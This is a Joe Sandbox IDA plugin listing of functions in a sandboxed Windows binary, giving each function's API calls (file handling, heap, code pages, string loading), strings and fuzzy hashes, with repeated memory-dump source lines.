Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: fb806b940757bb2d300bea627e36e83752635f4eab587e5ffaeb0e9020d3d12d
Instruction ID: 9f6d2a51047b597357f69da148ec8e10701657d9062f00c3650fc66b3643d5bd
Opcode Fuzzy Hash: fb806b940757bb2d300bea627e36e83752635f4eab587e5ffaeb0e9020d3d12d
Instruction Fuzzy Hash: 6701083250420EBBCF06AF90DD06DEE7F66EF48764F458154FE14662A0CB728A71EB91

Uniqueness

Uniqueness Score: -1.00%

Function 0010AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0010A56F), ref: 0010AF55

Strings

InitializeCriticalSectionEx, xrefs: 0010AF1B, 0010AF25

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 7e08ac157a64df94973d3b3b24936b79c9cb7f4d67987262c57ac4862d1e979d
Instruction ID: 36c787d848d0efdec8df78a15115eb36e29e791fdefa1c7c400e7a47e4806cbb
Opcode Fuzzy Hash: 7e08ac157a64df94973d3b3b24936b79c9cb7f4d67987262c57ac4862d1e979d
Instruction Fuzzy Hash: 1FF0B43168520CBBCF0A6F50CD06CED7F61EF54721B418064FD185A2A0DB714A509786

Uniqueness

Uniqueness Score: -1.00%

Function 0010ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0010ADEE

Strings

FlsAlloc, xrefs: 0010ADC0, 0010ADCA

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: e29249e728fef4bfad7f5ea9c8ffe375d034a8cbe2ddf5633b04e372bc5b4fa9
Instruction ID: 76ce3b1f61e3a00cecb960dcb2c5b35c53d30629f39e8fe1d51073ce86d70a54
Opcode Fuzzy Hash: e29249e728fef4bfad7f5ea9c8ffe375d034a8cbe2ddf5633b04e372bc5b4fa9
Instruction Fuzzy Hash: F8E0553068431C7BC209ABA4CE069EEBBA4CF54730B4100A8FC01973C0CFB04E8082C6

Uniqueness

Uniqueness Score: -1.00%

Function 000FEAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FEAF9

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Strings

3To, xrefs: 000FEAE7, 000FEAF3

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3To
API String ID: 1269201914-245939750
Opcode ID: 4ad83faef137195940f6643322eae8622c616cfae0c46d7cad70f9919929ae89
Instruction ID: 4453fbbea1b574bc73090c270c38709ff6a79640fe994fef78bc61eef438ae1f
Opcode Fuzzy Hash: 4ad83faef137195940f6643322eae8622c616cfae0c46d7cad70f9919929ae89
Instruction Fuzzy Hash: 67B012D62DA1C67C720872409E02C7B010CC3C0BE0330813FF615D48B2DE801C422472

Uniqueness

Uniqueness Score: -1.00%

Function 0010BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0010B7BB: GetOEMCP.KERNEL32(00000000,?,?,0010BA44,?), ref: 0010B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0010BA89,?,00000000), ref: 0010BC64
GetCPInfo.KERNEL32(00000000,0010BA89,?,?,?,0010BA89,?,00000000), ref: 0010BC77

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 80e451dfd88d08226d019cb41863732fe61fad52a5404a95158d4cd2fad35e68
Instruction ID: eee39cee1a6af62ec47b0e13b2389a586def7feb24335a253bfd43ae420a4091
Opcode Fuzzy Hash: 80e451dfd88d08226d019cb41863732fe61fad52a5404a95158d4cd2fad35e68
Instruction Fuzzy Hash: E75156709082499FEB249FB1C8C16FAFBE5EF51308F18446ED4D68B2D2D7B49945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 000E9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,000E9A50,?,?,00000000,?,?,000E8CBC,?), ref: 000E9BAB
GetLastError.KERNEL32(?,00000000,000E8411,-00009570,00000000,000007F3), ref: 000E9BB6

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 1ff51171d6442f0c8b13cb553d19cff2b1fd94d127534e9e6822af5301cfd3ea
Instruction ID: 63719e1c7bd9c0e63fad1949f2457a4eccfed725e7114006912b5c3c2644edc4
Opcode Fuzzy Hash: 1ff51171d6442f0c8b13cb553d19cff2b1fd94d127534e9e6822af5301cfd3ea
Instruction Fuzzy Hash: 3141C271604381CFDB24DF16E6844AEB7E6FFD4310F198A2DE891A3261D7B0ED458B91

Uniqueness

Uniqueness Score: -1.00%

Function 0010BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 001097E5: GetLastError.KERNEL32(?,00121098,00104674,00121098,?,?,001040EF,?,?,00121098), ref: 001097E9
Part of subcall function 001097E5: _free.LIBCMT ref: 0010981C
Part of subcall function 001097E5: SetLastError.KERNEL32(00000000,?,00121098), ref: 0010985D
Part of subcall function 001097E5: _abort.LIBCMT ref: 00109863

Part of subcall function 0010BB4E: _abort.LIBCMT ref: 0010BB80
Part of subcall function 0010BB4E: _free.LIBCMT ref: 0010BBB4

Part of subcall function 0010B7BB: GetOEMCP.KERNEL32(00000000,?,?,0010BA44,?), ref: 0010B7E6

_free.LIBCMT ref: 0010BA9F
_free.LIBCMT ref: 0010BAD5

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: d705c88d79d7eae0a7e546ea2d83f34524ffde2473d8d4368fd8d5c369c6ebc1
Instruction ID: 543125e021344c244c5068f869678b1c3f8f7fd5f739fe03df51302556ef5690
Opcode Fuzzy Hash: d705c88d79d7eae0a7e546ea2d83f34524ffde2473d8d4368fd8d5c369c6ebc1
Instruction Fuzzy Hash: EC31D931A08209EFDB14EFA8D581B9D77F5EF50324F254099E9849B2E2EBB25D40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 000E1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000E1E55

Part of subcall function 000E3BBA: __EH_prolog.LIBCMT ref: 000E3BBF

_wcslen.LIBCMT ref: 000E1EFD

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 40d44c6d410105df02b0cbea9643767a10fbc12a09638b47a05ef59fc101e431
Instruction ID: 1e3b7d2d2e698f4d9471d00244fa73dc3d687bdcb9b7f4f4504e2d9b8e95bf58
Opcode Fuzzy Hash: 40d44c6d410105df02b0cbea9643767a10fbc12a09638b47a05ef59fc101e431
Instruction Fuzzy Hash: 54312871904249AFCF15DF99C945AEEBBF6AF58300F10006AF895B7252CB325E51DB60

Uniqueness

Uniqueness Score: -1.00%

Function 000E9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000E73BC,?,?,?,00000000), ref: 000E9DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 000E9E70

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 6976b4a74d068873b181cd4e341c661c203024c113c5969da6da5b58fb609589
Instruction ID: b70363db3a9d2dd60adf749ed56380f8af4bb83867af4a61dc9c1751f74fd5f3
Opcode Fuzzy Hash: 6976b4a74d068873b181cd4e341c661c203024c113c5969da6da5b58fb609589
Instruction Fuzzy Hash: A821E132249295EFC714DF36C891AABBBE8AF95304F08491CF4C597541D339EA0CDB61

Uniqueness

Uniqueness Score: -1.00%

Function 000E966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,000E9F27,?,?,000E771A), ref: 000E96E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,000E9F27,?,?,000E771A), ref: 000E9716

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 02f53747673c10e91a523266e7d8dec0ad0a173b04a7d1eefd501681cf610cb8
Instruction ID: 2c5a2818e736fb6510c849e5d729d209add0dda059a8dac7e9e2000efffc432d
Opcode Fuzzy Hash: 02f53747673c10e91a523266e7d8dec0ad0a173b04a7d1eefd501681cf610cb8
Instruction Fuzzy Hash: 2D21C1711043846FE3709A66CC89FF7B7DCEB49324F004A1AFAD5D25D2C774A8849671

Uniqueness

Uniqueness Score: -1.00%

Function 000E9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 000E9EC7
GetLastError.KERNEL32 ref: 000E9ED4

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 8905a3f91c96187bfc3b080043f902143aabb37daf01512abdb62d7e6301aee3
Instruction ID: 2282e9ff0fa39647ca45fda356f391e0168c66e7f7b5992bd6cf071aa005217e
Opcode Fuzzy Hash: 8905a3f91c96187bfc3b080043f902143aabb37daf01512abdb62d7e6301aee3
Instruction Fuzzy Hash: 1611A531600750AFD734C62ACC45BAAB7E9AB45360F504A29E663F26D0D7B1ED45C760

Uniqueness

Uniqueness Score: -1.00%

Function 00108E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00108E75

Part of subcall function 00108E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00104286,?,0000015D,?,?,?,?,00105762,000000FF,00000000,?,?), ref: 00108E38

RtlReAllocateHeap.NTDLL(00000000,?,?,?,00000007,00121098,000E17CE,?,?,00000007,?,?,?,000E13D6,?,00000000), ref: 00108EB1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AllocateHeap$_free
String ID:
API String ID: 1482568997-0
Opcode ID: 23c3be5aae82a8bac04726617f7a07788d3b83bce36e36c203e11473a95221bc
Instruction ID: 33fd229c1e5ed61d6f701d2bdeabb0968b0f93b0c2a901a7a7245d733dfc53fe
Opcode Fuzzy Hash: 23c3be5aae82a8bac04726617f7a07788d3b83bce36e36c203e11473a95221bc
Instruction Fuzzy Hash: 97F0F63261D106A6DB253A25DC04BAF37688FA1B70F254125F9D8A61D1DFF0DD4081A0

Uniqueness

Uniqueness Score: -1.00%

Function 000F109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 000F10AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 000F10B2

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 625c42738afd8fbda441391f9bf36b1e4ed2ce4cd2cc52a2f7d897aa30e8cf61
Instruction ID: ea796f85728c4aeeea431891a81f3ea641ac5a7e00f43d47fd68352b74f8a056
Opcode Fuzzy Hash: 625c42738afd8fbda441391f9bf36b1e4ed2ce4cd2cc52a2f7d897aa30e8cf61
Instruction Fuzzy Hash: 10E09232B00249E7CF0D87A49C058FB72DDEB442443108175E613D3901FDB0DE8156A0

Uniqueness

Uniqueness Score: -1.00%

Function 000EE648 Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

LoadStringW.USER32(000E13B6,?,00121098,000E13B6), ref: 000EE678
LoadStringW.USER32(000E13B6,?,00121098), ref: 000EE68F

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 3335e6805b9ecc977ba74608535b380ab4993901d1890f84f85f08a14c50628e
Instruction ID: 4281717aa05f6dccff334945e7ac9d494bc6381b25d0f119701d2118bf13b842
Opcode Fuzzy Hash: 3335e6805b9ecc977ba74608535b380ab4993901d1890f84f85f08a14c50628e
Instruction Fuzzy Hash: F3F0FE79100298BFCF115F61EC04CEB7F69EF1A3947004016FE18A5131D23289A19BA4

Uniqueness

Uniqueness Score: -1.00%

Function 000EA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,000EA325,?,?,?,000EA175,?,00000001,00000000,?,?), ref: 000EA501

Part of subcall function 000EBB03: _wcslen.LIBCMT ref: 000EBB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000EA325,?,?,?,000EA175,?,00000001,00000000,?,?), ref: 000EA532

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: b01a660fb51657a59145eedb6d2a9cc41061420d276149869150dd8ff35a51db
Instruction ID: 8032f538a0a5fd01ba87d5199907cfbae5e14051508e0deef562118b14df9069
Opcode Fuzzy Hash: b01a660fb51657a59145eedb6d2a9cc41061420d276149869150dd8ff35a51db
Instruction Fuzzy Hash: 7EF0A032200249BBDF015F61DC01FDA3BACAF09385F488050B944E5164DB71DAD8EA50

Uniqueness

Uniqueness Score: -1.00%

Function 000EA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,000E977F,?,?,000E95CF,?,?,?,?,?,00112641,000000FF), ref: 000EA1F1

Part of subcall function 000EBB03: _wcslen.LIBCMT ref: 000EBB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,000E977F,?,?,000E95CF,?,?,?,?,?,00112641), ref: 000EA21F

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 1c7ca2e75dd3a2bfae1bb78eebef101e7c64bfa0177ee8ed42c92f5f961f747a
Instruction ID: 8ee06bdb63b5e9c66d58858f153008a1fbe8f9a617d72a25bba2080144fa9be1
Opcode Fuzzy Hash: 1c7ca2e75dd3a2bfae1bb78eebef101e7c64bfa0177ee8ed42c92f5f961f747a
Instruction Fuzzy Hash: C7E092312402496BDB015F65DC45FEA379CAB0C381F484025BA44E2065EB61EEC4DA60

Uniqueness

Uniqueness Score: -1.00%

Function 000FAC7C Relevance: 3.0, APIs: 2, Instructions: 26comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00112641,000000FF), ref: 000FACB0
OleUninitialize.OLE32(?,?,?,?,00112641,000000FF), ref: 000FACB5

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 64b9191be207ca0900d7fa198b5bee1493c76d9b80ad3fb57cabbe9fc0f8cf00
Instruction ID: bc39b90e3f9201fce1f261a14bda783786c677c87b71797d9d04e2fd7f742ac2
Opcode Fuzzy Hash: 64b9191be207ca0900d7fa198b5bee1493c76d9b80ad3fb57cabbe9fc0f8cf00
Instruction Fuzzy Hash: 0AE06572604650EFC715AB58DC06B45FBA9FB88B20F104265F416D3BB0CB746841CA90

Uniqueness

Uniqueness Score: -1.00%

Function 000EA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,000EA23A,?,000E755C,?,?,?,?), ref: 000EA254

Part of subcall function 000EBB03: _wcslen.LIBCMT ref: 000EBB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,000EA23A,?,000E755C,?,?,?,?), ref: 000EA280

